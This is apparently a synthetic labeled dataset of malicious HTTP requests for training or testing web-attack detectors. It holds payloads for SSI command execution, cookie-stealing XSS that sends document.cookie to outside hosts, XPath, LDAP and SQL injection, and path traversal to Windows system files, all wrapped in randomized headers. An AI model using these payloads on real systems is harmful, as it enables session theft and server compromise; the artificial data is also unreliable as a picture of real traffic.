Referer: http://www.inee.net/eislp0Iy/eioIsba/SH3u/fudueypi/onaclc.nsf
TE: gzip;q=0.1
Trailer: TE
User-Agent: kfE.yDvlU http://www.aneelw4.st
UA-CPU: MIPS
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: ag4wjm/5.9, sei6/6.5, sa3/7.1, 2sodF/1.7
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47820
Start - Id: 39998
class: SSI
GET /qXF/nPhSjmxzJXP@u/fCrLx/tietbmaEha6s/7VpBr/ieedt2S0rm/DLupdater.htm?aekehrsogavga=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l++++%2Fhome%2Foesnb%2Fveo5esE%22++--%3E HTTP/1.1
Host: www.eoEro3moE.gov:80
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.8
Accept-Encoding: *
Accept-Language: eqrgin-ts;q=0.8
Cache-Control: min-fresh=38678
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Sat, 27 Mar 10 22:53:55 UTC
ETag: "GSMMD@xD-PGzhzJr.ZS"
Expect: i6odg8a
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "JqJ7.a5rHK9o0un.us0q"
If-None-Match: *
If-Range: Sat, 10 Nov 07 15:50:00 CET
Max-Forwards: 4214
MIME-Version: 5.0
Pragma: l=e0oifetL
Proxy-Authorization: NTLM eGVoYU44dHJtYXJUODcyZWV6b25idTRpN3RpMmMzcmlEYnY0MW5qcmFjQQ==
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: /seo4/atjo.sh
TE: deflate;q=0.0
Trailer: TE
User-Agent: Mozilla/6.0 (compatible; MSIE 5.1; Solaris; oNtrynlti)
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: 2.4 146.130.173.215:5, FTP/0.0 www.usbrcmrc.shtml, HTTP/0.8 www.Ywer.png
Transfer-Encoding: noosa
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39998
Start - Id: 47191
class: XSS
GET /m21rD4j/gpO3_1U55s/eree6i7xQonn/efKVFv1g5Nae/6SlsfjaC/oK1S7H/ddfIdXCoeE5GWc/sQ.php3?OLS0ftpkmNiER9=woeeotvjewrodiebt&ha=renlo%3D+irris6Es&eap=45&reuuE=lnise8h5oshtt3n7&ao=%3Cimg++++src++%3D+%22++++detall+%3E+++%22+++onmouseover%3D+%22+++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.el.com%2Fcgi-bin%2Filatma.cgi%27%2Bdocument.cookie%29%3B%5D%22++++%3E&urlsZopwrw=ls&b6m0g4riuEie=tGCkZwNemXcn&plh=845202&2a=171&aysi4Nle=2th&AtaiaisoE3lO=ngppJ&ttenitamtpnha=rs0f HTTP/1.0
Host: 190.107.117.142
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 87eo-3eihvh, Shrolto-htast, o-Ie9, l2he-eU2aemLh;q=0.5
Cache-Control: only-if-cached
Client-ip: 34.140.216.85
Cookie: hAkWZwhereZlxy=761856;gnhtraapraduog=0552;ksEramree5i=it5rr ;chdrf69adhe=davareea;unoaeehl=try's:Aft/@q;WQechoIGPmuSC=c4tbbdQ
Cookie2: $Version="81"
Date: Fri, 16 Jun 06 16:22:15 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: ge5it=aiet
From: 7wria@hsclhu.org
If-Modified-Since: Sat, 12 Dec 09 14:37:03 UTC
If-Unmodified-Since: Sat, 16 Sep 06 22:49:57 UTC
If-Match: "RRAglu8YSeaNw1b6Zc@C"
If-None-Match: *
If-Range: "b1KEKK3Y5RKzgm_"
Max-Forwards: 9840
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: NTLM ZVNzT2dldGVpYWZoZWQ2U29uYW90RnNjSGJ3c2luOGxG
Range: 671-463
Referer: http://eadhdia.be/da9r9/tit8i/SlEelpn/8N8tnt.asmx
TE: trailers
Trailer: If-None-Match
User-Agent: iadAw/8.7.4.3
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47191
Start - Id: 46826
class: XSS
POST /OIiw@winntsMK_/c6lse05eOoeIwehraso/oMc/fuYuQ@cR/tLKiYUtF.jpeg? HTTP/1.0
Content-Length: 166
Content-Language: la,hihgito
Content-Encoding: gzip
Content-Location: http://e1h0.com/rnkeshhh/nEt4hrs/mabs.php
Content-MD5: bXBJanNyd3F6ZVV3YWU1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Nov 07 15:31:41 CET
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 200.200.183.33
Connection: close
Accept: image/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: ei='lf'
Client-ip: 169.136.109.14
Cookie: oRrArl5t7cd=ss;4SeElehrut=9Itx iekrRbr
Cookie2: $Version="9"
Date: Sun, 30 Mar 08 09:04:58 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Fri, 06 May 05 06:17:39 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Nov 09 04:58:10 GMT
Max-Forwards: 9492
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Digest cnonce="rw8aho"
Range: 04-141477,-19
Referer: http://etnu.be/ceemnA/TCleo/abkr8Tv/rdd8rnvn.pdf
TE: chunked;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/6.2 (X11; U; Solaris 6.4; Ew-th; rv:9.8.2) Gecko/18757610
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/6.8 www.metSrcu.png, ritte/6.7 182.1.169.83, 6.2 www.eaelnwg.css
Transfer-Encoding: identity
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PUcmdVjIk3kX7n=2555219&vshciE=<meta     http-equiv=    " refresh"     content  ="     0;url=javascript:  [alert('mreSm');]     " >

End - Id: 46826
Start - Id: 47585
class: XSS
GET /pnycuaars/rr/ds4ihacr4oo/rrteqbesjeFswpft/sXqrr62/eaalg/jlnah/mwmrs/iGVItnmwVAPU/jAyWVscriptIyhJ@W.png?elpncbsa=eprocessing-instructione8phpketrle&seulIsii8d4=ecZ4-kA&zt=%3Cxml++++id++%3D++%22++X+++++%22%3E%3Ca++%3E%3Cb%3E%26lt%3Bscript%3E%5Bwindow.open%28%27http%3A%2F%2F252.167.89.88%2Fetal.php4%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+%3E%3C%2Fa++++%3E%3C%2Fxml++++%3E&YHOqo@g9kT2=9UGvW&dacam8w=mc1r HTTP/1.0
Host: 48.133.158.128
Connection: ronXttLi
Accept: */*;q=0.2
Accept-Charset: iso-8859-4, x-mac-turkish
Accept-Encoding: gzip;q=0.5, deflate, gzip;q=0.6, compress;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 70.88.29.191
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Mon, 11 Feb 08 17:53:46 CET
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 100-continue
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Mar 08 17:21:40 GMT
Max-Forwards: 71
MIME-Version: 6.6
Pragma: wdtIulo='ce'
Proxy-Authorization: Digest qop=m2ta
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 849916-
Referer: /a9eNxlE/eanxeela/aIro7.shtml
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: hh2GSgE5 http://www.zmmqp.biz
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 8.0 179.60.33.156:19, HTTP/7.5 www.mJtbne.png:467
Transfer-Encoding: gzip
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47585
Start - Id: 35530
class: XPathInjection
POST /gCmPhBc7Ky2sWqZh/thWpLrXsvKf/reRKc2MlMvq/hlqui/fA9A0Y/0CUd8Pf_tIh.2/agV7p/IJwp-ziRSTYmo.N-j.exe? HTTP/1.1
Content-Length: 172
Content-Language: o6nsdsL,Edcfi,0hmsaimp
Content-Encoding: compress
Content-Location: /t0nf/jnjcs.bin
Content-MD5: NXlkaHNsc0RscjJvY21ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jun 08 22:21:52 UTC
Last-Modified: Mon, 14 Sep 09 13:16:10 UTC
Host: 237.168.44.240
Connection: cfoenth
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.1
Accept-Language: me-osRael;q=0.6, enrHqie-yo;q=0.0, l2lt-5zzeAb, ttdnla-hihzersO;q=0.1
Cache-Control: max-stale
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Sat, 03 May 08 14:44:30 CET
ETag: W/"XioESPEeFrnADNJ"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 09 Jul 06 11:55:54 CET
If-Unmodified-Since: Tue, 13 Jan 09 04:30:50 CET
If-Match: *
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: "-O1iXHy.2uB_9Sf6S"
Max-Forwards: 6915
MIME-Version: 8.9
Pragma: ena='amtet'
Authorization: Basic dnVhN3M6bnByMmE=
Referer: /eeqat.php
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 1.3; ro-ah; rv:2.8.3) Gecko/46339889
UA-CPU: 68000
UA-Disp: 740,794,8
Via: HTTP/4.9 www.8tcyNh.jpg, 5.4 www.Aadxvnos.htm, 0.1 www.oc12.js:53
Transfer-Encoding: deflate
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 729 81.169.14.55 "k7tiinwireni" "Mon, 24 Dec 07 19:28:46 GMT"
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

hEor=spTb4sh95msso&eeLoema=jb8eaare' or    6   < count(path/child::*)   or     'qicnv0'   =  '&mhtrE=ae1rhs4vhtRolori&i8I7Tnseb=ihWgnn&MetPeiavg3uA=nE

End - Id: 35530
Start - Id: 45063
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: 194.190.255.240
Connection: keep-alive
Accept: audio/basic;q=0.3, application/*, video/mpeg
Accept-Charset: iso-8859-3, windows-1258;q=0.9, x-mac-ce;q=0.2, iso-8859-6, iso-8859-4;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="628"
Date: Tue, 08 Sep 09 06:47:59 UTC
ETag: W/"VI05iHgMeDWsSIG"
Expect: lldiV
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Mon, 07 Jan 08 24:25:13 CET
If-Unmodified-Since: Tue, 12 Apr 05 07:44:30 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: NTLM bHRoZXRvdG1yMmw5cm1lbnlvNDVsNWFhM3NkZHVveWlp
Authorization: NTLM dDZmdGh3cmVoZXJ3eDV0ZWh0dGR4cm90dGVnRXJpZ2QzaW9idGx1ZU84aTZycnJ0
Range: 373-850
Referer: /nirt/bOe8b/lfesk.asp
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 3.6; Ir-gw; rv:9.4.1) Gecko/30128362
UA-CPU: 68000
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45063
Start - Id: 48348
class: XPathInjection
GET /c1e2Mi8uanyaW3s/3iwegyemht8n/tndja/tJChN/httpsZandtLZsadmineval0njPg.swf? HTTP/1.1
Host: www.oyd1.uk:80
Connection: keep-alive
Accept: text/plain, application/*;q=0.5
Accept-Charset: windows-1253;q=0.5, x-mac-cyrillic;q=0.6, windows-1251, euc-kr
Accept-Encoding: 519 or     aea8ih/toh9e/ac/child::node()[position()=734] or  28797=
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 201.243.131.154
Cookie: nIanto=afNoYxon;ooRLihn=1kuI;9snrnwlsapdm=939;2yzo=664121;mperSdornoL=ito
Cookie2: $Version="2"
Date: Thu, 12 Jan 06 01:44:56 GMT
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: 100-continue
From: hwfhil@lisb.de
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Tue, 20 Mar 07 05:40:28 CET
If-Match: "tjEpXq-MJp6.c6Dwh"
If-None-Match: "ycfKVnmrS5B1vgkkMf"
If-Range: "hPt.QYl8w3FPf.fjjx"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: ee=stliL3
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: NTLM c3Joczl2bmVlYW9lZTlrZGNiaHNobGhnOWFiNG9wZWE=
Range: -579124,02412-
Referer: http://twsondwm.be/eRsU/zatey0n/jd8Pm5/NtN2.asp
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 5.8; ed-di; rv:8.4.9) Gecko/50749347
UA-Color: color8
UA-Pixels: 784x5970
Via: 4.1 235.17.245.119
Transfer-Encoding: gzip
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48348
Start - Id: 39100
class: LdapInjection
PUT /owJAQMe43FkPk/vci8cusmaxasrn/tK2JeIKhwSAB.moPf/_0nfQ.php3? HTTP/1.1
Content-Length: 206
Content-Language: to,medmntt,qx
Content-Encoding: deflate
Content-Location: /or0gb/esse.txt
Content-MD5: ZWVyNWVuZWFtY2Vuc0FhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Aug 05 13:07:41 CET
Last-Modified: Wed, 05 Nov 08 06:34:45 UTC
Host: www.otspe3m.be
Connection: a5raUsdn
Accept: video/*;q=0.2, image/gif, application/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: 7fs8rrc1-e;q=0.8, ty2rjwi-hLho;q=0.8
Cache-Control: max-stale
Client-ip: 133.82.168.94
Cookie: Gtelnetc1=zs)(&(objectClass =   etoe*);ao7be6a9rini=rsy0
Cookie2: $Version="208"
Date: Tue, 01 Jun 04 24:25:20 GMT
ETag: W/"zSESMi609uroL3G"
Expect: hhhrtm
If-Modified-Since: Wed, 17 May 06 02:37:47 CET
If-Unmodified-Since: Mon, 29 Mar 04 19:16:34 GMT
If-Match: "eSvWpqsI@6bZDBW0R"
If-None-Match: "Goe5kxVaT_qlsrUr_"
If-Range: "xry4hEVnv_bBE2TR"
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: Basic bmg0SXR0VGc6dVRjbg==
Authorization: Digest cnonce="varn"
Range: -3,502-
Referer: /euagen/jtks.bin
TE: trailers,trailers,chunked;q=0.8
Trailer: Host
User-Agent: krIrm9ben/9.3.5
UA-CPU: Sparc
UA-Disp: 873,752,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 825x605
Via: 4.2 221.132.52.231, 1.0 www.7gge.png:1
Transfer-Encoding: gzip
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 156 www.anuenrdb.jpg "stUa8h3rlELwts" 
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 21391
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

tlynac=~Dr&GbpDI=nxm9htpasssobbint&vt=c1nlp0enwi4alui&b2efWrpttzl1biw=m7y &rWznaraensrd4mK=$mtxbetween=hometuqa&5glhsisneasmtf=tftoro7edfi&selectPeq8vizZ=;"joscript]o2"cmd>o1a@gscriptopten

End - Id: 39100
Start - Id: 45607
class: PathTransversal
GET /9qde3utssrebdGe/Y9-y/aZiu/gcfTS4oEh8eeema.css?kEsteflosgut7=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&pduzDwU=7380462 HTTP/1.0
Host: 147.11.140.217
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 145.209.224.15
Cookie: h71oxqBFesej=~ren;ddbatmsnVoo97=9735;4tMrOabLt9Hbro6=5;A6nR41Mr=8881370;CTUFp3YjYO=ishyThekt
Cookie2: $Version="71"
Date: Sun, 05 Feb 06 24:32:02 GMT
ETag: "1uZHYBpjmXTTQQw"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Sun, 22 Jan 06 07:30:39 GMT
If-Unmodified-Since: Wed, 01 Mar 06 19:29:14 CET
If-Match: *
If-None-Match: "Kuy0exQ6iP5PSU5iP1"
If-Range: Wed, 07 Mar 07 21:48:36 UTC
Max-Forwards: 07
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: /dhct9s/t25uudih.php3
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept-Encoding
User-Agent: IEjaigeasd/3.5.5.4.4
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 413x730
Via: 9.3 www.amin.css
Transfer-Encoding: uRazet; srieue=hqohnosi
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 158 www.Ttdiei.css:7666 "nmlzcnl1" 
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45607
Start - Id: 47721
class: XSS
GET /d4HP@4hE35oL@kRB/fonSaad0a/rWyP/rafqelv9ttnz6h0pds.swf?2awspe1r=%3Cstyle+type%3D+++%22++text%2Fjavascript++%22%3E%5Balert+++%28%27gtw%27%29%3B%5D%3C%2Fstyle+%3E&tsni8lbdotet=499760353 HTTP/1.0
Host: www.hl06.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, euc-cn, cp-950
Accept-Encoding: 
Accept-Language: eolde3d-bszeNt, rngd-scleroeo, kftotwn-bh, ra-deer1Oi, nan-eogtuh42
Cache-Control: oLlo='sjutu1'
Client-ip: 90.114.63.204
Cookie: omc8T=pihg;tgeern=httpeA;s5luar=w;hqurT0pgn=t2El;dhqH=nse
Cookie2: $Version="6"
Date: Wed, 05 Jul 06 03:43:53 GMT
ETag: W/".Yvf.hV0JUrMVXmG"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Sat, 04 Feb 06 17:37:15 CET
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "uNpEbDHFRRaZIoPuI3"
If-None-Match: "ICfXt0tcyh3@APsya"
If-Range: Thu, 18 Aug 05 18:57:21 CET
Max-Forwards: 770
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: NTLM N3N0cmNzNnNzNm10ZDA4ZWV3dDNldGNhdGVuS29sY290aDFhcmplYw==
Range: 2174-,56-,-57382
Referer: http://www.bejpi.net/Iv4bctfe.avi
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.2 (compatible; tcekajaesq; Linux i386; tT4ree; ueohm; o7ttdhednh)
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5167x472
Via: 1.3 36.189.106.225, HTTP/4.2 www.shwm5.tiff, FTP/0.1 118.89.79.36
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47721
Start - Id: 41547
class: SqlInjection
POST /hauaa.js? HTTP/1.0
Content-Length: 53
Content-Language: enm0O
Content-Encoding: deflate
Content-Location: /qo7A/uaTm/e3pty2v/1wusgle.css
Content-MD5: ZW5ra3RlbWlpZTJZZmxPYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 22:31:18 UTC
Last-Modified: Wed, 18 Jan 06 03:55:45 GMT
Host: www.ls2z5.be
Connection: adncsnc
Accept: text/plain, text/html;q=0.5, text/*;q=0.6
Accept-Charset: x-mac-ce, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 141.137.190.71
Cookie: rLennialE=rJc4iROAL
Cookie2: $Version="56"
Date: Wed, 03 Feb 10 18:05:51 GMT
ETag: W/"I-1BCZuVOcSp3nVg"
Expect: 100-continue
From: gJohs0a@amewNlgh.cz
If-Modified-Since: Wed, 18 Mar 09 09:06:27 UTC
If-Unmodified-Since: Wed, 26 Sep 07 12:08:25 CET
If-Match: *
If-None-Match: "7ewjcuuVN8q3s@3rEJ"
If-Range: "BqgqwkFJK2-68UUUyw4e"
Max-Forwards: 44
MIME-Version: 6.1
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 277481-,6038-
Referer: http://a4di.it/rseh5/abtee.png
TE: trailers,chunked
Trailer: Expect
User-Agent: anoev/3.1.8.1.0
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8585x974
Via: FTP/0.2 www.nut4ix.png
Transfer-Encoding: gzip
Upgrade: iaDf6/1.7, ftqty/7.0, ewiv/6.4, asctho/8.1
Warning: 751 www.Lnbf.js "segwzwse" 
X-Forwarded-For: 84.75.227.228
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

iaj='  OR 'ws7'  <  'X&DCYj=rgreiepnoeyuchm

End - Id: 41547
Start - Id: 47659
class: XSS
GET /iBS7/oyqexx2i/tsPmtoe.htm?7htaccesFASHywlB=0-X&ayttnlDLgzhx=bFnien&3IANzuCmqhtaccesEo=passwdn%28dT7u4n&coernycpun=%3Cdiv+onmouseover+++%3D++++%22+++++%5Bwindow.open%28%27http%3A%2F%2F15.61.68.213%2Finel.mdb%27%2Bdocument.cookie%29%3B%5D+%22+%3E&stt0os=ewt5so+tzc4N&tgeDRsaAegptF=ld2yhpndhgoantnwR&3Cpjhtlew3=isoqtgeieleh&blnyxoziSzotr0=Q1vdpsrne&leo5Myh2=54477&7oT=ieeru9y+bd63ep&eetponb=hobjectAnnl%29a&nbo2ste=h_4GbW2&gTe=+tpasswdhn1tg44hs+ai%2Ban%2F%2B&eis=t4roEneaoo45eSd8&hj0d.=816739254 HTTP/1.0
Host: 202.133.168.14:02
Connection: keep-alive
Accept: image/png;q=0.0, image/png;q=0.9
Accept-Charset: windows-1258, hz-gb-2312;q=0.1, iso-8859-1, x-mac-ce;q=0.0, windows-1251;q=0.2
Accept-Encoding: identity, deflate, deflate, identity, deflate;q=0.9
Accept-Language: nisnlr-eBg, uyratrgs-u
Cache-Control: min-fresh=57
Client-ip: 39.154.184.38
Cookie: 16qE=bhlkoA4ds4;zia25spiPe=sl7ldon a( n);yta0vNrhvg=)ana;teaexO=~k6e;mI50H15andzK=a
Cookie2: $Version="35"
Date: Tue, 23 Feb 10 09:39:44 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Fri, 28 Aug 09 23:06:32 CET
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 15:22:52 UTC
Max-Forwards: 23
MIME-Version: 7.7
Pragma: edtogof='ettrone'
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: http://www.isic3no5.biz/diylhsLf/n8ltnd1/hncerlrs.avi
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 1.0; e7-tr; rv:5.8.7) Gecko/42633957
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7165x674
Via: 4.9 23.1.222.104
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 452 www.Iau7Ie.jpeg "2HekEIt" "Sat, 30 Apr 05 16:23:39 UTC"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47659
Start - Id: 42558
class: SqlInjection
GET /M2jjYinputBxchildXhV/xJ_jq-Yf/iuthtfodarail/soajw5/31gJpCQrDaPmUSGSaa8/eshvtijeiip9p8rms/eg1-b.nFGOIrQu.asp?ulefwonermcilS=49178992&F3cs=%27%29+UNION+++++ALL++SELECT++25%2C9%2C251%2C8%2C3+FROM+++++seb1r++WHERE+++++%28%27%27+++%3D++++%27&VtqcaMyNkLb.=3933&boi91cerg=deletetcatsock_streamag+m+%3E%24wp-system%40tEar&p5fxrqeeet=yhHnetco&esull=eoUTMii5nee&pi=Eihowatum7eiet9&sig7tsNr3c=ryx%24%40&D948GM7C6S=%28%5D%7E&hhidih4zrT=t%24T&ygzh3kuhjpccd=eihlteoZopaiwOA1p&alu=atsts HTTP/1.0
Host: www.mtuje.gov
Connection: r1o1
Accept: */*
Accept-Charset: euc-jp;q=0.2, shift_jis;q=0.8, iso-8859-15, x-mac-korean, x-mac-hebrew;q=0.9
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 29.213.12.81
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="462"
Date: Fri, 20 Mar 09 20:38:07 GMT
ETag: "TraGuu_QjplOnZR"
Expect: 100-continue
From: spods@kyeiscew.net
If-Modified-Since: Thu, 16 Apr 09 09:42:07 UTC
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: "MU_MYS__Qa3ZXWnG"
If-None-Match: *
